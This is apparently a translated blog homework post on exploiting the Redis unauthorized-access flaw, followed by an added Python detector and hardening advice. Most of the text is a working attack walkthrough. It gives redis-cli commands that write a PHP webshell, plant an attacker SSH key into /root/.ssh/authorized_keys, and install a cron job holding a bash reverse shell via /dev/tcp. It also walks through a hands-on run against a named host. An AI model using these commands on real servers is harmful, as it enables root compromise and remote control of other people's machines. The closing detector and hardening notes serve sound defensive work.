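June homework: exploiting the Redis unauthorized-access vulnerability

I happened to come across an expert's blog post that covered the Redis vulnerability, so I put together some notes and ran a hands-on test.

0x00 Notes

1. Writing a webshell

dir=<absolute path>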

dbfilename="1.php"

2. Writing an SSH public key

Generate a public key on the local machine:

ssh-keygen -t rsa -C "test@test"

dir=/root/.ssh/

dbfilename=authorized_keys

\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n

3. Writing a cron job to get a reverse shell

dir=/var/spool/cron

dbfilename=root

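set crack "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n"

0x01 Hands-on test

Use the Redis client to connect to the remote host's port.

The IP is masked (nice masking job, right?)

Steps to get the webshell:

config set dir <absolute path of the website>

config set dbfilename info.php // set info.php as the dump file

set web '' // write the one-line webshell into info.php

save // save; you can then connect to the info.php URL with Caidao (China Chopper)

Finally, getshell:

0x0000 Addendum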

ssh-keygen -t rsa

Enter the save path

Enter the passphrase: dyboy

Enter the passphrase again: dyboy

saved in /root/.ssh/id_rsa.

key has been saved in /root/.ssh/id_rsa.pub.

Write the public key to foo.txt

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

Run the command:

cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

The response is OK

Connect to the host and enter the shell:

/usr/redis/redis-cli -h 172.16.12.2 -p 6379

config set dir /root/.ssh/

config set dbfilename "authorized_keys"

save

exit

Connect to the host over SSH
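
On the defending side, all three techniques in the notes leave the same trace: CONFIG SET on dir or dbfilename followed by SAVE. The following is an added example, not part of the original post: a Python detector that scans `redis-cli MONITOR` output for that sequence. The sample lines, client addresses and the lists of sensitive paths are constructed assumptions.

```python
import re

# redis-cli MONITOR line: <unix ts> [<db> <client addr>] "cmd" "arg" ...
LINE = re.compile(r'^(\S+) \[\d+ (\S+)\] (.*)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')

def risky_dir(path):
    # Directories used in the SSH-key and cron techniques in the notes.
    p = path.rstrip("/")
    return any(p == d or p.startswith(d + "/")
               for d in ("/root/.ssh", "/var/spool/cron"))

def risky_name(name):
    # Dump file renamed to a key file, a crontab, or a web script.
    n = name.lower()
    return n in ("authorized_keys", "root") or n.endswith(".php")

RISKY = {"dir": risky_dir, "dbfilename": risky_name}

def detect(lines):
    """Alert on SAVE/BGSAVE issued while dir or dbfilename is retargeted."""
    cfg, alerts = {}, []  # cfg is server-wide: key -> (value, client that set it)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, client, rest = m.groups()
        args = ARG.findall(rest)
        verb = [a.lower() for a in args[:3]]
        if verb[:2] == ["config", "set"] and len(args) >= 4 and verb[2] in RISKY:
            cfg[verb[2]] = (args[3], client)
        elif verb[:1] in (["save"], ["bgsave"]):
            hits = [f"{k}={v} (set by {c})"
                    for k, (v, c) in sorted(cfg.items()) if RISKY[k](v)]
            if hits:
                alerts.append({"ts": ts, "client": client, "hits": hits})
    return alerts

# Constructed MONITOR capture (documentation addresses, placeholder key).
SAMPLE = [
    r'1529900000.000001 [0 203.0.113.7:50112] "set" "crackit" "\n\nssh-rsa <constructed>\n\n"',
    r'1529900001.000002 [0 203.0.113.7:50112] "config" "set" "dir" "/root/.ssh/"',
    r'1529900002.000003 [0 203.0.113.7:50112] "config" "set" "dbfilename" "authorized_keys"',
    r'1529900003.000004 [0 203.0.113.7:50112] "save"',
    r'1529900100.000005 [0 10.0.0.5:41000] "get" "session:42"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Detection complements prevention rather than replacing it: bind Redis to a private interface, set requirepass, and run it as an unprivileged user so that SAVE cannot write into /root/.ssh or /var/spool/cron.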

  • Original link: https://kuaibao.qq.com/s/20180625G008QK00?refer=cp_1026